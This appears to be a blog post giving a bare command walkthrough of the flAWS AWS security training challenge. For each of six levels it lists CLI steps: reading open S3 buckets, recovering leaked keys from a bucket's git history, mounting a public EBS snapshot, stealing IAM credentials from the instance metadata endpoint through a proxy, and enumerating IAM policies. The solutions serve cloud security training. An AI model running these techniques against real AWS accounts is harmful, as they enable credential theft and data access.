# flAWS challenge


Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@ip
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/

No comments: